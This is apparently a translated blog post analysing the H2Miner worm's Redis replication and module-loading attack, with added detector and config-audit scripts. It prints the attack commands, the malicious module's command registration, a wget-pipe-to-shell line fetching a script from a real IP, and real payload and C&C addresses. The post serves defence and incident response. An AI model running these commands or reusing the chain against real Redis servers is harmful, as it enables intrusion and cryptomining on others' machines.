A new outbreak of H2Miner worms exploiting Redis RCE has been discovered

The other day, one of my project's servers was attacked by a worm of this kind. Looking for an answer to the question "what was that?", I found a good article by the Alibaba Cloud Security team. Since I could not find this article on Habr, I decided to translate it specially <3

Introduction

Recently, the Alibaba Cloud security team observed a sudden outbreak of H2Miner. This malicious worm uses missing authentication or weak passwords on Redis as its entry point into your systems. It then pushes its malicious module to the victim through master-slave replication, so that the module ends up written to disk on the attacked machine, where the worm loads it and executes malicious commands.

Previously, attacks through Redis were carried out mainly by writing scheduled tasks (cron jobs) or SSH keys to the machine after the attacker had connected to Redis. Fortunately, that method often fails because of file permission controls or differences between system versions. The module-loading method, however, lets the attacker execute commands directly or obtain a shell, which is far more dangerous for your system.

Given the large number of Redis servers exposed on the Internet (about 1 million), the Alibaba Cloud security team, as a friendly reminder, recommends that users not expose Redis to the Internet and that they regularly check the strength of their passwords and whether those passwords could be compromised by quick brute-force guessing.

H2Miner

H2Miner is a mining botnet for Linux-based systems that can attack your system in several ways, including unauthenticated Hadoop YARN, Docker, and Redis remote command execution (RCE). The botnet works by downloading malicious scripts and malware to mine cryptocurrency on your hosts, spread laterally, and maintain command-and-control (C&C) communication.

Redis RCE

Information about this issue was shared by Pavel Toporkov at ZeroNights 2018. Since version 4.0, Redis supports loading modules: users can load shared objects compiled from C into Redis to add new Redis commands. This feature, while useful, can be abused because, in master-slave mode, files can be pushed to the slave through a full synchronization. An attacker can use this to transfer a malicious file. Once the transfer is complete, the attacker loads the module on the attacked Redis instance and executes arbitrary commands.

Analysis of the malware worm

Recently, the Alibaba Cloud security team found that the H2Miner family of malicious miners has grown dramatically. According to the analysis, the general attack process is as follows:


H2Miner uses Redis RCE for the whole attack. The attackers first target unprotected Redis servers or servers with weak passwords.

They then use the command config set dbfilename red2.so to change the name of the dump file. After that, the attackers issue the slaveof command to set the address of the master that the victim should replicate from.

Once the attacked Redis instance has established a master-slave connection with the malicious Redis controlled by the attacker, the attacker sends the malicious module using the full-resync (fullresync) command, which transfers the "dump" file in full. The red2.so file is then written to disk on the attacked machine. The attackers then run module load ./red2.so to load the file. The module can execute commands sent by the attacker or open a reverse connection (a backdoor) to give access to the attacked machine.

/* Commands registered by the malicious module (from its RedisModule_OnLoad):
 * system.exec runs an attacker-supplied shell command,
 * system.rev opens a reverse shell to the attacker. */
if (RedisModule_CreateCommand(ctx, "system.exec",
        DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
        RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
    return REDISMODULE_ERR;

After executing a malicious command such as /bin/sh -c wget -q -O- http://195.3.146.118/unk.sh | sh > /dev/null 2>&1, the attacker resets the dump file name and unloads the system module to cover their tracks. However, the red2.so file remains on the attacked machine. Users are advised to check their Redis instance's working directory for such a suspicious file.
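The command sequence described in the steps above (dbfilename rewritten to a .so, replication pointed at the attacker's host, the module loaded, the module's own command run, then the clean-up) is visible in the output of Redis MONITOR. The following detector is an added example and is not part of the original article or of the worm: it parses MONITOR-style lines, tags each relevant command with a stage, and reports clients that complete the chain. The MONITOR lines are constructed for the example; the attacker address 203.0.113.5 is an assumed placeholder, while red2.so, the module name "system", the system.exec command and the unk.sh URL come from the article.

```python
"""Flag the Redis master-slave module-loading chain in MONITOR output.

Added example, not code from the article. MONITOR prints one line per
command:  <timestamp> [<db> <client ip:port>] "CMD" "arg1" "arg2" ...
"""
import re
from collections import defaultdict

MONITOR_RE = re.compile(r'^(?P<ts>[\d.]+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')   # one quoted argument, escapes allowed


def parse_monitor_line(line):
    """Return {'ts', 'client', 'cmd', 'args'} or None for non-MONITOR text."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    args = ARG_RE.findall(m.group('args'))
    if not args:
        return None
    return {'ts': float(m.group('ts')), 'client': m.group('client'),
            'cmd': args[0].upper(), 'args': args[1:]}


def classify(ev):
    """Map one parsed command to an attack-chain stage, or None if uninteresting."""
    cmd, args = ev['cmd'], [a.lower() for a in ev['args']]
    if cmd == 'CONFIG' and len(args) >= 3 and args[0] == 'set':
        if args[1] == 'dbfilename':
            return 'dbfilename_so' if args[2].endswith('.so') else 'dbfilename_reset'
        if args[1] == 'dir':
            return 'dir_change'
    if cmd in ('SLAVEOF', 'REPLICAOF') and args and args[0] != 'no':
        return 'slaveof'                      # 'slaveof no one' is not a hit
    if cmd == 'MODULE' and args and args[0] == 'load':
        return 'module_load'
    if cmd == 'MODULE' and args and args[0] == 'unload':
        return 'module_unload'
    if cmd.startswith('SYSTEM.'):             # system.exec / system.rev from the article
        return 'module_command'
    return None


def detect_chain(lines):
    """Return {client: [stages]} for clients that set a .so dbfilename, point
    replication at another host and then load a module (in that order)."""
    stages = defaultdict(list)
    for line in lines:
        ev = parse_monitor_line(line)
        if ev is None:
            continue
        stage = classify(ev)
        if stage:
            stages[ev['client']].append(stage)
    hits = {}
    for client, seq in stages.items():
        if ('dbfilename_so' in seq and 'slaveof' in seq and 'module_load' in seq
                and seq.index('dbfilename_so') < seq.index('module_load')):
            hits[client] = seq
    return hits


# Constructed MONITOR capture: one attacker session, one benign application client.
SAMPLE_MONITOR = """\
1577000001.000000 [0 203.0.113.5:51234] "config" "set" "dbfilename" "red2.so"
1577000001.200000 [0 203.0.113.5:51234] "slaveof" "203.0.113.5" "6379"
1577000004.500000 [0 203.0.113.5:51234] "module" "load" "./red2.so"
1577000004.700000 [0 203.0.113.5:51234] "system.exec" "wget -q -O- http://195.3.146.118/unk.sh | sh > /dev/null 2>&1"
1577000005.000000 [0 203.0.113.5:51234] "config" "set" "dbfilename" "dump.rdb"
1577000005.100000 [0 203.0.113.5:51234] "module" "unload" "system"
1577000010.000000 [0 10.0.0.7:40001] "get" "session:abc"
1577000011.000000 [0 10.0.0.7:40001] "config" "set" "dbfilename" "dump.rdb"
1577000012.000000 [0 10.0.0.7:40001] "replicaof" "no" "one"
""".splitlines()

if __name__ == '__main__':
    for client, seq in detect_chain(SAMPLE_MONITOR).items():
        print(client, '->', ' > '.join(seq))
```

The same stages can be fed from a `redis-cli MONITOR` pipe in production; the order check matters because a legitimate operator may change dbfilename or run `replicaof` on its own, but will not follow them with `module load` of the file it just named.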

Besides killing competing malicious mining (resource-stealing) processes, the attacker's malicious script downloads and executes a malicious binary from 142.44.191.122/kinsing. This means that a process name or directory name containing kinsing on a host may indicate that the machine is infected with this worm.

According to the results of reverse engineering, the malware mainly performs the following functions:

  • Downloads files and executes them
  • Mines cryptocurrency
  • Maintains C&C communication and executes the attackers' commands


It uses masscan for external scanning in order to spread further. In addition, the IP address of the C&C server is hard-coded into the program, and the attacked host communicates with the C&C server over HTTP requests, with information about the zombie (the compromised server) carried in the HTTP headers.


GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
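The check-in above is easy to fingerprint on a proxy or from a packet capture: the host inventory travels in non-standard headers (Arch, Cores, Mem, Os, Osname, Osversion, Root, S, Uuid, Version), the User-Agent claims desktop Chrome on Windows while the Os header says linux, the path is a single character, and the Host is one of the listed C&C addresses. The function below is an added example, not part of the article, that parses a raw HTTP request and lists which of those traits it matches. The two requests are constructed for the test (the Uuid value is a placeholder); the C&C addresses are the ones listed in the article.

```python
"""Fingerprint the worm's C&C check-in from a raw HTTP/1.x request.

Added example, not code from the article or from the malware.
"""

# C&C addresses listed in the article
C2_HOSTS = {'45.10.88.102', '91.215.169.111', '139.99.50.255',
            '46.243.253.167', '195.123.220.193'}
# Inventory headers seen in the beacon (compared case-insensitively)
BEACON_HEADERS = {'arch', 'cores', 'mem', 'os', 'osname', 'osversion',
                  'root', 's', 'uuid', 'version'}


def parse_request(raw):
    """Return (method, path, headers) with header names lower-cased."""
    head = raw.replace('\r\n', '\n').split('\n\n', 1)[0]
    request_line, *header_lines = head.split('\n')
    method, path, _version = request_line.split(' ', 2)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(':')
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def score_beacon(raw):
    """Return the list of beacon traits the request matches (empty if none)."""
    method, path, h = parse_request(raw)
    reasons = []
    present = BEACON_HEADERS & set(h)
    if len(present) >= 4:
        reasons.append('inventory headers: ' + ', '.join(sorted(present)))
    if h.get('os', '').lower() == 'linux' and 'Windows' in h.get('user-agent', ''):
        reasons.append('Os header says linux but User-Agent claims Windows')
    host = h.get('host', '').split(':')[0]
    if host in C2_HOSTS:
        reasons.append('Host matches known C&C address ' + host)
    if method == 'GET' and len(path.strip('/')) == 1:
        reasons.append('single-character path ' + path)
    return reasons


def is_h2miner_beacon(raw):
    """Two independent traits are required, so a single odd header does not alert."""
    return len(score_beacon(raw)) >= 2


# Constructed beacon modelled on the request shown in the article.
SAMPLE_BEACON = (
    "GET /h HTTP/1.1\r\n"
    "Host: 91.215.169.111\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: 11111111-2222-3333-4444-555555555555\r\n"   # placeholder, not a real value
    "Version: 26\r\nAccept-Encoding: gzip\r\n\r\n"
)

# Constructed benign request for comparison.
SAMPLE_BENIGN = (
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
    "User-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n"
)

if __name__ == '__main__':
    for reason in score_beacon(SAMPLE_BEACON):
        print('-', reason)
```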

Other attack methods

[Figure: the worm's other attack methods; the image is not reproduced in the text]

Addresses and links used by the worm

URLs

• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh

C&C

• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193

Recommendations

First, Redis must not be reachable from the Internet and must be protected with a strong password. It is also important that customers check that there is no red2.so file in the Redis working directory and that no file or process name on the host contains "kinsing".
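The recommendations above translate into a handful of redis.conf settings. The following audit script is an added example, not from the article or from Redis: it parses a redis.conf-style text and reports the conditions this worm relies on (listening on all interfaces, protected-mode off, no or short requirepass) and whether the commands the attack chain needs (CONFIG, SLAVEOF/REPLICAOF, MODULE, plus DEBUG) are still callable. The directives it checks are real Redis ones: rename-command with an empty name disables a command, and Redis 7 additionally has enable-module-command, which defaults to no. Both sample configurations are constructed; the password in the hardened one is a placeholder.

```python
"""Audit a redis.conf for the exposure this worm exploits.

Added example, not code from the article or from the Redis project.
"""

# Commands the attack chain in the article needs, plus DEBUG for good measure.
ATTACK_COMMANDS = ['CONFIG', 'SLAVEOF', 'REPLICAOF', 'MODULE', 'DEBUG']


def parse_conf(text):
    """Return [(directive, [args])] in file order; '#' comments are stripped
    (so a password containing '#' would have to be quoted differently)."""
    out = []
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if line:
            parts = line.split()
            out.append((parts[0].lower(), parts[1:]))
    return out


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checks fired."""
    conf = parse_conf(text)

    def last(name):
        vals = [args for d, args in conf if d == name]
        return vals[-1] if vals else None

    findings = []
    bind = last('bind')
    if bind is None or any(a in ('0.0.0.0', '*', '::') for a in bind):
        findings.append('bind: Redis listens on all interfaces')   # default when absent
    pm = last('protected-mode')
    if pm and pm[0].lower() == 'no':
        findings.append('protected-mode no: unauthenticated remote clients are accepted')
    rp = last('requirepass')
    password = rp[0].strip('"') if rp else ''
    if not password:
        findings.append('requirepass: no password set')
    elif len(password) < 16:
        findings.append('requirepass: password shorter than 16 characters')
    # rename-command <CMD> "" disables the command entirely.
    disabled = {args[0].upper() for d, args in conf
                if d == 'rename-command' and len(args) == 2 and args[1] in ('""', "''")}
    emc = last('enable-module-command')
    if emc and emc[0].lower() == 'no':          # Redis 7+: MODULE disabled by default
        disabled.add('MODULE')
    for cmd in ATTACK_COMMANDS:
        if cmd not in disabled:
            findings.append(f'{cmd}: still callable by any authenticated client')
    return findings


# Constructed sample: Redis reachable from the Internet with a guessable password.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
requirepass 123456
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample: local-only, authenticated, attack-surface commands disabled.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "Gq7vR2pX9sLm4TzW8bNc1"
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command DEBUG ""
"""

if __name__ == '__main__':
    for label, conf in (('weak', WEAK_CONF), ('hardened', HARDENED_CONF)):
        print(label, '->', audit_redis_conf(conf) or 'no findings')
```

Disabling CONFIG and MODULE for everyone is the blunt option; on Redis 6 and later the same effect can be scoped per user with ACLs (for example denying the @dangerous category to application users), which this audit does not evaluate.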

Source: www.habr.com
